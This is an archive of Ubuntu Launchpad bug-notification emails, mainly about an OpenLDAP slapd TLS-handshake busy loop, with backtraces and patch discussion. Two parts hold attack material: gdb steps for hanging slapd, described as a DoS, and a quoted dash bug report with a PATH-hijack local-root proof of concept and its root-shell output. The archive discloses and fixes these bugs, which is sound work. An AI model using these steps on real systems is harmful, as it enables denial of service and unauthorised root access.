from:"Stephane Chazelas"

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-21 Thread Stephane Chazelas

Thanks.

I notice your first write() is on fd 3 while the 2nd is on stdout (while
for me the first 2 are on fd 3, which in my case is the LDAPS socket).
For the issue to be reproduced, we need the client to be paused after
having send the TLS "client hello".

The first time the breakpoint is hit, you should be seeing something
like:

```
#0  __GI___libc_write (fd=3, buf=0x55ace4ab, nbytes=75) at 
../sysdeps/unix/sysv/linux/write.c:27
#1  0x7797b408 in sb_debug_write (sbiod=0x55ab4810, 
buf=0x55ace4ab, len=75) at ../../../../libraries/liblber/sockbuf.c:854
#2  0x76bd5a0a in _gnutls_writev_emu (fd=fd@entry=0x5578f240, 
giovec=giovec@entry=0x7fff9b90, giovec_cnt=giovec_cnt@entry=3,
vec=0, session=, session=) at buffers.c:447
#3  0x76bd608c in _gnutls_writev (total=126, giovec_cnt=3, 
giovec=0x7fff9b90, session=0x5578d3d0) at buffers.c:504
#4  _gnutls_io_write_flush (session=session@entry=0x5578d3d0) at 
buffers.c:698
#5  0x76bd7200 in _gnutls_handshake_io_write_flush 
(session=session@entry=0x5578d3d0) at buffers.c:820
#6  0x76bd9348 in _gnutls_send_handshake 
(session=session@entry=0x5578d3d0, bufel=bufel@entry=0x55acd620,
type=type@entry=GNUTLS_HANDSHAKE_FINISHED) at handshake.c:1335
#7  0x76bda4ed in _gnutls_send_finished (again=, 
session=0x5578d3d0) at handshake.c:763
#8  send_handshake_final (session=session@entry=0x5578d3d0, 
init=init@entry=1) at handshake.c:3098
#9  0x76bdcd29 in handshake_client (session=0x5578d3d0) at 
handshake.c:2946
#10 gnutls_handshake (session=0x5578d3d0) at handshake.c:2626
#11 0x77bbb183 in tlsg_session_accept (session=0x55abb070) at 
tls_g.c:361
#12 0x77bb8751 in ldap_int_tls_connect (ld=ld@entry=0x557890d0, 
conn=) at tls2.c:362
#13 0x77bb9466 in ldap_int_tls_start (ld=ld@entry=0x557890d0, 
conn=conn@entry=0x55789500, srv=srv@entry=0x55789440)
at tls2.c:860
#14 0x77b912b6 in ldap_int_open_connection (ld=ld@entry=0x557890d0, 
conn=conn@entry=0x55789500, srv=0x55789440,
async=async@entry=0) at open.c:448
#15 0x77ba634d in ldap_new_connection (ld=ld@entry=0x557890d0, 
srvlist=srvlist@entry=0x55789198, use_ldsb=use_ldsb@entry=1,
connect=connect@entry=1, bind=bind@entry=0x0, m_req=m_req@entry=0, m_res=0) 
at request.c:487
#16 0x77b9074a in ldap_open_defconn (ld=ld@entry=0x557890d0) at 
open.c:41
#17 0x77ba7908 in ldap_send_initial_request 
(ld=ld@entry=0x557890d0, msgtype=msgtype@entry=96, dn=dn@entry=0x0, 
ber=0x557894a0,
msgid=1) at request.c:130
#18 0x77b9ab8f in ldap_sasl_bind (ld=0x557890d0, dn=0x0, 
mechanism=, cred=0x557692e0 , sctrls=0x0,
cctrls=0x0, msgidp=0x7fffa2dc) at sasl.c:164
#19 0xd33b in ?? ()
#20 0x844f in ?? ()
#21 0x77388bf7 in __libc_start_main (main=0x81b0, argc=4, 
argv=0x7fffe638, init=, fini=,
rtld_fini=, stack_end=0x7fffe628) at 
../csu/libc-start.c:310
#22 0x966a in ?? ()
```

And we need to make sure the server or client doesn't reject that
connection outright.

It would worth running "tshark -i any -f 'port 636'" in the mean time to
verify the "client hello" is sent and that the server is willing to
carry on the connection.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  Confirmed

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in sched_yield syscall and consumme all CPU.
  To recover, slapd needs to restart.
  No related information is reported in log file.
  All same issues in OpenLDAP upstream project are old and fixed.
  So maybe this issue affects only Ubuntu package.
  It occurs randomly, so I have no steps to reproduce.

  
  OS : Bionic

  Openldap version:

  libldap-2.4-2:amd642.4.45+dfsg-1ubuntu1.10
 
  libldap-common 2.4.45+dfsg-1ubuntu1.10
 
  slapd  2.4.45+dfsg-1ubuntu1.10
 

  Modules loaded:

  olcModuleLoad: {0}back_bdb
  olcModuleLoad: {1}syncprov
  olcModuleLoad: {2}back_monitor
  olcModuleLoad: {3}memberof.la
  olcModuleLoad: {4}refint.la
  olcModuleLoad: {5}rwm
  olcModuleload: {6}back_ldap

  
  Backend is BDB. slapd run in (single) master - (multi) slave mode.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1926265/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   :

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-20 Thread Stephane Chazelas

lincvz:
> Thank you for the patch and your investigations. In the next few days, I 
> cannot install the patched package on my production machines. I'll let you 
> know when I can.

Thanks.

Can you reproduce a similar issue with the modus operandi (using gdb) I
describe above?

(Note that while it renders slapd unresponsive, service is restored as
soon as you quit or detach gdb on the client).

If you do, it would be worth getting a backtrace on the slapd threads
again, so see if you get the same ones as before or some similar to
mine.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  Confirmed

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in sched_yield syscall and consumme all CPU.
  To recover, slapd needs to restart.
  No related information is reported in log file.
  All same issues in OpenLDAP upstream project are old and fixed.
  So maybe this issue affects only Ubuntu package.
  It occurs randomly, so I have no steps to reproduce.

  
  OS : Bionic

  Openldap version:

  libldap-2.4-2:amd642.4.45+dfsg-1ubuntu1.10
 
  libldap-common 2.4.45+dfsg-1ubuntu1.10
 
  slapd  2.4.45+dfsg-1ubuntu1.10
 

  Modules loaded:

  olcModuleLoad: {0}back_bdb
  olcModuleLoad: {1}syncprov
  olcModuleLoad: {2}back_monitor
  olcModuleLoad: {3}memberof.la
  olcModuleLoad: {4}refint.la
  olcModuleLoad: {5}rwm
  olcModuleload: {6}back_ldap

  
  Backend is BDB. slapd run in (single) master - (multi) slave mode.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1926265/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-17 Thread Stephane Chazelas

> This is a valid issue, but are we certain it's the same one? The
> reporter talked about sched_yield and their backtraces included several
> threads of back_monitor waiting on some kind of lock.

You're right. It may be a different issue (though possibly linked to the
same root cause). In my case, all other threads are stuck on:

#0  0x7f2a010fdad3 in futex_wait_cancelable (private=, 
expected=0, futex_word=0x55d92cadaa78) at 
../sysdeps/unix/sysv/linux/futex-internal.h:88
#1  __pthread_cond_wait_common (abstime=0x0, mutex=0x55d92cadaa28, 
cond=0x55d92cadaa50) at pthread_cond_wait.c:502
#2  __pthread_cond_wait (cond=cond@entry=0x55d92cadaa50, 
mutex=mutex@entry=0x55d92cadaa28) at pthread_cond_wait.c:655
#3  0x7f2a01fc7475 in ldap_pvt_thread_cond_wait 
(cond=cond@entry=0x55d92cadaa50, mutex=mutex@entry=0x55d92cadaa28) at 
../../../../libraries/libldap_r/thr_posix.c:277
#4  0x7f2a01fc6d1b in ldap_int_thread_pool_wrapper (xpool=0x55d92cadaa20) 
at ../../../../libraries/libldap_r/tpool.c:683
#5  0x7f2a010f76db in start_thread (arg=0x7f29f99b6700) at 
pthread_create.c:463
#6  0x7f2a00e1971f in clone () at 
../sysdeps/unix/sysv/linux/x86_64/clone.S:95

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  Confirmed

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in sched_yield syscall and consumme all CPU.
  To recover, slapd needs to restart.
  No related information is reported in log file.
  All same issues in OpenLDAP upstream project are old and fixed.
  So maybe this issue affects only Ubuntu package.
  It occurs randomly, so I have no steps to reproduce.

  
  OS : Bionic

  Openldap version:

  libldap-2.4-2:amd642.4.45+dfsg-1ubuntu1.10
 
  libldap-common 2.4.45+dfsg-1ubuntu1.10
 
  slapd  2.4.45+dfsg-1ubuntu1.10
 

  Modules loaded:

  olcModuleLoad: {0}back_bdb
  olcModuleLoad: {1}syncprov
  olcModuleLoad: {2}back_monitor
  olcModuleLoad: {3}memberof.la
  olcModuleLoad: {4}refint.la
  olcModuleLoad: {5}rwm
  olcModuleload: {6}back_ldap

  
  Backend is BDB. slapd run in (single) master - (multi) slave mode.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1926265/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-17 Thread Stephane Chazelas

** Information type changed from Public to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  Confirmed

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in sched_yield syscall and consumme all CPU.
  To recover, slapd needs to restart.
  No related information is reported in log file.
  All same issues in OpenLDAP upstream project are old and fixed.
  So maybe this issue affects only Ubuntu package.
  It occurs randomly, so I have no steps to reproduce.

  
  OS : Bionic

  Openldap version:

  libldap-2.4-2:amd642.4.45+dfsg-1ubuntu1.10
 
  libldap-common 2.4.45+dfsg-1ubuntu1.10
 
  slapd  2.4.45+dfsg-1ubuntu1.10
 

  Modules loaded:

  olcModuleLoad: {0}back_bdb
  olcModuleLoad: {1}syncprov
  olcModuleLoad: {2}back_monitor
  olcModuleLoad: {3}memberof.la
  olcModuleLoad: {4}refint.la
  olcModuleLoad: {5}rwm
  olcModuleload: {6}back_ldap

  
  Backend is BDB. slapd run in (single) master - (multi) slave mode.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1926265/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-14 Thread Stephane Chazelas

> It can be reproduced by running on a client:
> 
> gdb --args ldapsearch -H ldaps://ldap.example.com -x
> 
> Then in gdb:
> 
> break write
> run
> continue

I can no longer reproduce it after I rebuild and install the libldap
package with
https://github.com/openldap/openldap/commit/4c1ab16ade18a253dd81df7e6eced4d920ac6a8e
applied.

Note that since the above is enough to render slapd unresponsive for 15
minutes, it could be considered as a serious DoS vulnerability.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  Confirmed

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in sched_yield syscall and consumme all CPU.
  To recover, slapd needs to restart.
  No related information is reported in log file.
  All same issues in OpenLDAP upstream project are old and fixed.
  So maybe this issue affects only Ubuntu package.
  It occurs randomly, so I have no steps to reproduce.

  
  OS : Bionic

  Openldap version:

  libldap-2.4-2:amd642.4.45+dfsg-1ubuntu1.10
 
  libldap-common 2.4.45+dfsg-1ubuntu1.10
 
  slapd  2.4.45+dfsg-1ubuntu1.10
 

  Modules loaded:

  olcModuleLoad: {0}back_bdb
  olcModuleLoad: {1}syncprov
  olcModuleLoad: {2}back_monitor
  olcModuleLoad: {3}memberof.la
  olcModuleLoad: {4}refint.la
  olcModuleLoad: {5}rwm
  olcModuleload: {6}back_ldap

  
  Backend is BDB. slapd run in (single) master - (multi) slave mode.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1926265/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-14 Thread Stephane Chazelas

Yes,
https://github.com/openldap/openldap/commit/735e1ab14bb055344b4e767a216aa410aa7d1503
can't be directly applied there. There have been other changes in
between in that section including changes in API, so it would take more
effort to backport that fix.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  New

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in sched_yield syscall and consumme all CPU.
  To recover, slapd needs to restart.
  No related information is reported in log file.
  All same issues in OpenLDAP upstream project are old and fixed.
  So maybe this issue affects only Ubuntu package.
  It occurs randomly, so I have no steps to reproduce.

  
  OS : Bionic

  Openldap version:

  libldap-2.4-2:amd642.4.45+dfsg-1ubuntu1.10
 
  libldap-common 2.4.45+dfsg-1ubuntu1.10
 
  slapd  2.4.45+dfsg-1ubuntu1.10
 

  Modules loaded:

  olcModuleLoad: {0}back_bdb
  olcModuleLoad: {1}syncprov
  olcModuleLoad: {2}back_monitor
  olcModuleLoad: {3}memberof.la
  olcModuleLoad: {4}refint.la
  olcModuleLoad: {5}rwm
  olcModuleload: {6}back_ldap

  
  Backend is BDB. slapd run in (single) master - (multi) slave mode.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1926265/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-14 Thread Stephane Chazelas

cherry picking
https://github.com/openldap/openldap/commit/4c1ab16ade18a253dd81df7e6eced4d920ac6a8e
should fix this particular issue but reintroduce
https://bugs.openldap.org/show_bug.cgi?id=8650.

It may be necessary to pick
https://github.com/openldap/openldap/commit/735e1ab14bb055344b4e767a216aa410aa7d1503
as well but as that's much more recent, I can't tell if it's valid on
top of the package used in bionic. I'm going to do some tests.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  New

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in sched_yield syscall and consumme all CPU.
  To recover, slapd needs to restart.
  No related information is reported in log file.
  All same issues in OpenLDAP upstream project are old and fixed.
  So maybe this issue affects only Ubuntu package.
  It occurs randomly, so I have no steps to reproduce.

  
  OS : Bionic

  Openldap version:

  libldap-2.4-2:amd642.4.45+dfsg-1ubuntu1.10
 
  libldap-common 2.4.45+dfsg-1ubuntu1.10
 
  slapd  2.4.45+dfsg-1ubuntu1.10
 

  Modules loaded:

  olcModuleLoad: {0}back_bdb
  olcModuleLoad: {1}syncprov
  olcModuleLoad: {2}back_monitor
  olcModuleLoad: {3}memberof.la
  olcModuleLoad: {4}refint.la
  olcModuleLoad: {5}rwm
  olcModuleload: {6}back_ldap

  
  Backend is BDB. slapd run in (single) master - (multi) slave mode.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1926265/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

2021-05-14 Thread Stephane Chazelas

The important backtrace in there is the one from thread 11:

#0  0x7fb288428474 in read () from /lib/x86_64-linux-gnu/libpthread.so.0
No symbol table info available.
#1  0x7fb2890c4518 in ?? () from /usr/lib/x86_64-linux-gnu/liblber-2.4.so.2
No symbol table info available.
#2  0x7fb287895848 in ?? () from /usr/lib/x86_64-linux-gnu/libgnutls.so.30
No symbol table info available.
#3  0x7fb28788f96a in ?? () from /usr/lib/x86_64-linux-gnu/libgnutls.so.30
No symbol table info available.
#4  0x7fb287896d03 in ?? () from /usr/lib/x86_64-linux-gnu/libgnutls.so.30
No symbol table info available.
#5  0x7fb28789991c in ?? () from /usr/lib/x86_64-linux-gnu/libgnutls.so.30
No symbol table info available.
#6  0x7fb2878a10cb in ?? () from /usr/lib/x86_64-linux-gnu/libgnutls.so.30
No symbol table info available.
#7  0x7fb28789d572 in gnutls_handshake () from 
/usr/lib/x86_64-linux-gnu/libgnutls.so.30
No symbol table info available.
#8  0x7fb289304199 in ?? () from 
/usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2
No symbol table info available.
#9  0x7fb289301abb in ldap_pvt_tls_accept () from 
/usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2
No symbol table info available.
#10 0x556b843e6f69 in connection_read (cri=, s=430) at 
../../../../servers/slapd/connection.c:1375

debug symbols are missing there, but I have the exact same problem and
get:

#0  0x7f2a01101474 in __libc_read (fd=40, buf=0x7f29dc142ecb, nbytes=5) at 
../sysdeps/unix/sysv/linux/read.c:27
#1  0x7f2a01db0518 in sb_debug_read (sbiod=0x7f29dc10e940, 
buf=0x7f29dc142ecb, len=5) at ../../../../libraries/liblber/sockbuf.c:829
#2  0x7f2a00558848 in _gnutls_stream_read (ms=0x7f29e8ffb41c, 
pull_func=0x7f2a01ff1da0 , size=5, bufel=, 
session=0x7f29dc008060) at buffers.c:344
#3  _gnutls_read (ms=0x7f29e8ffb41c, pull_func=0x7f2a01ff1da0 , 
size=5, bufel=, session=0x7f29dc008060) at buffers.c:424
#4  _gnutls_io_read_buffered (session=session@entry=0x7f29dc008060, total=5, 
recv_type=recv_type@entry=4294967295, ms=0x7f29e8ffb41c) at buffers.c:579
#5  0x7f2a0055296a in recv_headers (ms=, 
record=0x7f29e8ffb470, htype=GNUTLS_HANDSHAKE_CLIENT_KEY_EXCHANGE, 
type=GNUTLS_HANDSHAKE, record_params=0x7f29dc1279f0, session=0x7f29dc008060) at 
record.c:1045
#6  _gnutls_recv_in_buffers (session=session@entry=0x7f29dc008060, 
type=type@entry=GNUTLS_HANDSHAKE, 
htype=htype@entry=GNUTLS_HANDSHAKE_CLIENT_KEY_EXCHANGE, ms=, 
ms@entry=0) at record.c:1173
#7  0x7f2a00559d03 in _gnutls_handshake_io_recv_int 
(session=session@entry=0x7f29dc008060, 
htype=htype@entry=GNUTLS_HANDSHAKE_CLIENT_KEY_EXCHANGE, 
hsk=hsk@entry=0x7f29e8ffb580, optional=optional@entry=0) at buffers.c:1412
#8  0x7f2a0055c91c in _gnutls_recv_handshake 
(session=session@entry=0x7f29dc008060, 
type=type@entry=GNUTLS_HANDSHAKE_CLIENT_KEY_EXCHANGE, 
optional=optional@entry=0, buf=buf@entry=0x7f29e8ffb830) at handshake.c:1465
#9  0x7f2a005640cb in _gnutls_recv_client_kx_message 
(session=session@entry=0x7f29dc008060) at kx.c:563
#10 0x7f2a00560572 in handshake_server (session=0x7f29dc008060) at 
handshake.c:3327
#11 gnutls_handshake (session=0x7f29dc008060) at handshake.c:2629
#12 0x7f2a01ff2199 in tlsg_session_accept (session=0x7f29dc1133f0) at 
tls_g.c:363
#13 0x7f2a01fefabb in ldap_pvt_tls_accept (sb=0x7f299c0051a0, 
ctx_arg=0x55d92cbca560) at tls2.c:425


and I've tracked it down to:

https://bugs.openldap.org/show_bug.cgi?id=8650#c12

Basically, what we see is one thread stuck in a busy loop doing read()s
on the TCP socket which all return immediately with EAGAIN as the fd is
in non-blocking mode.

In my cases, the client go offline just after sending the TLS client
hello.  That lasts for 15 minutes or about, probably until some timeout
after which the TCP connection is eventually considered dead.

It can be reproduced by running on a client:

gdb --args ldapsearch -H ldaps://ldap.example.com -x

Then in gdb:

break write
run
continue

Then the client is paused after sending the TLS "client hello".

https://bugs.openldap.org/show_bug.cgi?id=8650#c12 explains that it's
https://github.com/openldap/openldap/commit/7b5181da8cdd47a13041f9ee36fa9590a0fa6e48
that is responsible for the issue.

https://github.com/openldap/openldap/commit/4c1ab16ade18a253dd81df7e6eced4d920ac6a8e
reverted that commit, but that one did not make it into bionic.

So cherry picking
https://github.com/openldap/openldap/commit/4c1ab16ade18a253dd81df7e6eced4d920ac6a8e
should fix it.

** Bug watch added: bugs.openldap.org/ #8650
   https://bugs.openldap.org/show_bug.cgi?id=8650

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1926265

Title:
  slapd enter in infinite loop on sched_yield syscall

Status in openldap package in Ubuntu:
  New

Bug description:
  On a production server, sometimes slapd become unbresponsive, some threads 
loops in

[Touch-packages] [Bug 827151] Re: Annoying log message "DIGEST-MD5 common mech free"

2019-04-19 Thread Stephane Chazelas

See with just running ldapsearch after upgrade to 16.04:

```
# repeat 10 ldapsearch -x > /dev/null
# tail /var/log/auth.log
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
Apr 19 14:53:01 hostname ldapsearch: DIGEST-MD5 common mech free
```

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cyrus-sasl2 in Ubuntu.
https://bugs.launchpad.net/bugs/827151

Title:
  Annoying log message "DIGEST-MD5 common mech free"

Status in Cyrus-sasl2:
  New
Status in cyrus-sasl2 package in Ubuntu:
  Fix Released
Status in cyrus-sasl2 source package in Trusty:
  Triaged
Status in cyrus-sasl2 source package in Xenial:
  Incomplete
Status in cyrus-sasl2 source package in Yakkety:
  Fix Released
Status in cyrus-sasl2 package in Debian:
  Fix Released

Bug description:
  I recently updated the libsasl2-modules to 
2.1.24~rc1.dfsg1+cvs2011-05-23-4ubuntu1 in oneiric.
  That triggered the bug also described in Debian here: 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=631932

  The annoying message is logged in auth.log. In my case, it is associated with 
svnserve:
  svnserve: DIGEST-MD5 common mech free

  I'm not exactly sure what action triggers the message, but I can
  investigate more if required.

  $ lsb_release -rd
  Description:Ubuntu oneiric (development branch)
  Release:11.10

To manage notifications about this bug go to:
https://bugs.launchpad.net/cyrus-sasl2/+bug/827151/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()

2015-05-26 Thread Stephane Chazelas

correction on my previous comment:

My point 1 is only true on Debian and derivatives. bash does drop its
privilege when setuid and called as sh without -p just like when not
called as sh, but Debian's bash package has a patch that disables that
dropping of privileges when called as sh.

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

** Bug watch added: Debian Bug tracker #52586
   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dash in Ubuntu.
https://bugs.launchpad.net/bugs/1215660

Title:
  dash does not drop privileges when euid != uid, this can cause local
  root exploits when setuid programs use system() or popen()

Status in dash package in Ubuntu:
  Triaged

Bug description:
  Poorly written setuid programs may call 'popen' or 'system' with
  incorrectly specified arguments. For instance, there is a bug in
  vmware-mount where it calls popen('lsb-release') (CVE-2013-1662). It
  should be popen('/usr/bin/lsb-release'). Because of this, an
  attacker can drop a file named 'lsb-release' in . and then call
  vmware-mount, and it will happily popen the attacker controlled file
  as root.

  Now, bash has a 'privdrop' option, however debian removed this option in the 
1990's:
  
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff
 and
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

  Most shells will drop privs when euid != uid, because it turns out
  calling popen / system from setuid scripts is nearly impossible to get
  right (in fact, pretty much any setuid script is insanely difficult to
  write without a vulnerability in it.

  Ensure /bin/sh is dash
  antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release'main(){system(sh`tty` 
21);}';PATH=.:$PATH vmware-mount
  # whoami   
  root

  If we switched to a sane shell (like busybox for example.)
  antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release'main(){system(/bin/sh`tty` 
21);}';PATH=.:$PATH vmware-mount

  BusyBox v1.18.5 (Ubuntu 1:1.18.5-1ubuntu4.1) built-in shell (ash)
  Enter 'help' for a list of built-in commands.

  /usr/local/google/home/antarus $ whoami
  whoami: unknown uid X # I have omitted my actual UID, needless to say it 
isn't uid 0 :)

  Now you may be saying 'hey i don't have vmware-mount handy' so
  instead:

  antarus@goats5 ~ $ cat /tmp/silly_setuid.c 
  #include stdio.h

  int main(int argc, char ** argv) {
popen(lsb_release, r);
  }

  antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
  antarus@goats5 ~ $ sudo chown root:root silly_setuid 
  [sudo] password for antarus: 
  antarus@goats5 ~ $ sudo chmod 4755 silly_setuid 
  antarus@goats5 ~ $ cc -xc - -olsb_release'main(){system(whoami`tty` 
21);}';PATH=.:$PATH silly_setuid
  antarus@goats5 ~ $ root

  Distributor ID: Ubuntu
  Description:Ubuntu 12.04.1 LTS
  Release:12.04
  Codename:   precise

  antarus@goats5 ~ $ apt-cache policy dash
  dash:
Installed: 0.5.7-2ubuntu2
Candidate: 0.5.7-2ubuntu2
Version table:
   *** 0.5.7-2ubuntu2 0
  600 my-apt-mirror ubuntu-precise/main amd64 Packages
  100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dash/+bug/1215660/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()

2014-10-03 Thread Stephane Chazelas

There are several incorrect statements in the initial report and the
linked CVE.

1. bash doesn't drop its privilege when setuid when called as sh. It
only does so when called as bash and without the -p option. It does
however go into a mode where it does not trust its environment as much
as when it's not setuid. It still trusts  $PATH though.

2. pdksh like ATT ksh or bash when called as sh, does not drop
privileges on startup. It enters the privileged mode in which it is
more careful in what it does with the environment (for instance, ignores
ENV as mandated by POSIX). Only recent versions of mksh (and possibly
OpenBSD sh/ksh) based on pdksh drop the privileges.

3. Non-Linux sh are generally not pdksh.  From the major ones, only
OpenBSD and MirBSD have shells *based* on pdksh. Other BSDs generally
have a shell based on the Almquist shell (dash itself is mostly based on
NetBSD sh) or bash (like OS/X) and commercial unices generally on ATT
ksh88

4. So it's not most shells dropping privileges. bash (as sh), dash,
pdksh, ATT ksh, yash don't. Only some pdksh derivatives and bash when
called as sh do.

5. calling popen(/usr/bin/lsb-release) as root is not the right
solution as lsb-release doesn't need super-user privileges and is not
guaranteed to be found in /usr/bin and is at least on Debian a python
script (python's behaviour can also be affected by env vars) that relies
on PATH to find other utilities, so PATH would still need to be
sanitized).

So dash is not any more vulnerable that any other shell in that regard
and is certainly a much better choice in terms of security for /bin/sh
than any other bigger shell like bash, zsh or ATT ksh.

Changing dash so it drops privileges is likely to break some usages
(rare as it's widely known that calling shells in setuid contexts is
very risky).

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dash in Ubuntu.
https://bugs.launchpad.net/bugs/1215660

Title:
  dash does not drop privileges when euid != uid, this can cause local
  root exploits when setuid programs use system() or popen()

Status in “dash” package in Ubuntu:
  Triaged

Bug description:
  Poorly written setuid programs may call 'popen' or 'system' with
  incorrectly specified arguments. For instance, there is a bug in
  vmware-mount where it calls popen('lsb-release') (CVE-2013-1662). It
  should be popen('/usr/bin/lsb-release'). Because of this, an
  attacker can drop a file named 'lsb-release' in . and then call
  vmware-mount, and it will happily popen the attacker controlled file
  as root.

  Now, bash has a 'privdrop' option, however debian removed this option in the 
1990's:
  
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff
 and
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

  Most shells will drop privs when euid != uid, because it turns out
  calling popen / system from setuid scripts is nearly impossible to get
  right (in fact, pretty much any setuid script is insanely difficult to
